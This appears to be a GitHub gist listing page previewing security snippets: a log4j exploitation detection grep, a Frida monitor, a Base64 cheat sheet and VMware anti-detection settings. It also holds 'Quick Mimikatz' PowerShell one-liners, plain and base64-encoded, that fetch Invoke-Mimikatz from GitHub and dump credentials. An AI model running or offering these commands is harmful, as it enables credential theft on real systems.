Skip to content

Instantly share code, notes, and snippets.

View idafchev's full-sized avatar

Ilia Dafchev idafchev

39 followers · 5 following
View GitHub Profile
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active January 28, 2024 08:19
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@uf0o
uf0o / ioctl_translator.py
Created March 26, 2021 14:00
import argparse
import sys
def auto_int(x):
return int(x, 0)
# Modded by Matteo 'uf0' Malvica - 2021
# The following code is taken from
# https://github.com/mwrlabs/win_driver_plugin/blob/master/win_driver_plugin/ioctl_decoder.py
@Little-Ki
Little-Ki / [1] Description
Last active March 13, 2024 12:53
[Code] [Kernel] ObRegisterCallbacks
// The ObRegisterCallbacks routine registers a list of callback routines for thread, process, and desktop handle operations.
// This function is a most public method used by anti cheat / anti virus software.
// Offical document:
// https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obregistercallbacks
// Function syntax:
// NTSTATUS ObRegisterCallbacks(
// POB_CALLBACK_REGISTRATION CallbackRegistration,
// PVOID *RegistrationHandle
@matterpreter
matterpreter / NtMonitor.py
Last active February 27, 2024 09:38
Frida script to spawn a process and monitor Native API calls
import frida
import sys
def on_message(message, data):
if message['type'] == 'send':
print(message['payload'])
elif message['type'] == 'error':
print(message['stack'])
else:
print(message)
@Neo23x0
Neo23x0 / Base64_CheatSheet.md
Last active March 10, 2024 09:15
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

Base64 Code Mnemonic Aid Decoded* Description
JAB 🗣 Jabber $. Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq 📺 Television MZ MZ header
SUVY 🚙 SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA 💪 "Pah!" <. Often used by Emotet (UTF-16)
@kstreepy
kstreepy / gz_extract.py
Created June 11, 2019 16:09
For a given directory, unzip all .gz files in folder, save unzipped files in folder and deleted zipped files. A python solution for instances where you do not have access to PowerShell.
import os, gzip, shutil
dir_name = 'x'
def gz_extract(directory):
extension = ".gz"
os.chdir(directory)
for item in os.listdir(directory): # loop through items in dir
if item.endswith(extension): # check for ".gz" extension
gz_name = os.path.abspath(item) # get full path of files
@DamianSuess
DamianSuess / SpecialFolderLocations.md
Last active February 2, 2024 19:25
C# Environment.SpecialFolder
@rkennesson
rkennesson / vmware.txt
Last active April 3, 2024 23:02
VMWare - hide the fact that you are running in a VM
#https://www.google.com/search?q=smbios.reflecthost&oq=smbios.r&aqs=chrome.0.0j69i57j0l4.2850j0j7&sourceid=chrome&ie=UTF-8 | smbios.reflecthost - Google Search
#http://www.bitcon.be/how-to-install-an-hp-branded-windows-os-as-a-virtual-server/ | How to install an HP branded Windows OS as a virtual server | BITCON - IT consultants
#https://communities.vmware.com/thread/162241?tstart=0 | This system is not supported platform |VMware Communities
#https://superuser.com/questions/199906/how-to-edit-bios-information-for-a-virtual-machine-in-vmware | How to edit BIOS information for a virtual machine in VMWare? - Super User
#http://www.insanelymac.com/forum/topic/292170-how-to-spoof-real-mac-in-vmware/ | How to spoof real Mac in VMware - Multi-booting and Virtualisation - InsanelyMac Forum
Method 1: edit VMX file for the specific VM
#add this line
SMBIOS.reflectHost = TRUE
@gfoss
gfoss / Quick-Mimikatz
Last active October 26, 2023 09:48
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl
@Rottweiler
Rottweiler / gist:44fe4461a4552acf303a
Last active January 18, 2023 10:49
Heavily obfuscated UnConfuserEx tool
UnConfuserEx https://mega.nz/#!U1hxwQKb!7WFBSjrZgg8ieFp15K0RJW8rWuyMHZTO9bpCekhBQfY
ConfuserExDupPopPatcher https://mega.nz/#!IkhHzZDS!vPYABdYJtuDIGJBHdKzwIqLajxugJaNlENWr5CWjNlo
ConfuserExStringDecryptor https://mega.nz/#!plhxRJyY!Vq9eRS-gixC__q75860gDD8Tcm_ncOfCCCP_HQKguUM
ConfuserExCallFixer https://mega.nz/#!0gZFlbwC!KFka_Kxe-GuU-d8COni91xmGPbiRnbX6lBLYAomn7No
I'm not responsible for what you do with these -- they may very well be backdoored